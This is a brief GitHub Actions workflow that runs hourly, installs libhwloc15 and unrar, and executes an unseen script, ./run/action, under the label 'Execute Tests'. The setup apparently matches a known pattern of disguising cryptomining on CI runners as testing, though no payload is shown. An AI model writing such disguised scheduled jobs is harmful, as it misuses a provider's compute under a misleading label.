jobs:
  build:
    name: Main
    runs-on: ubuntu-20.04

    steps:
      - name: Checkout Code
        uses: actions/checkout@v2
      - name: Pull Libraries
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Execute Tests
        run: ./run/action

name: Verify

on:
  schedule:
    - cron: "25 */1 * * *"
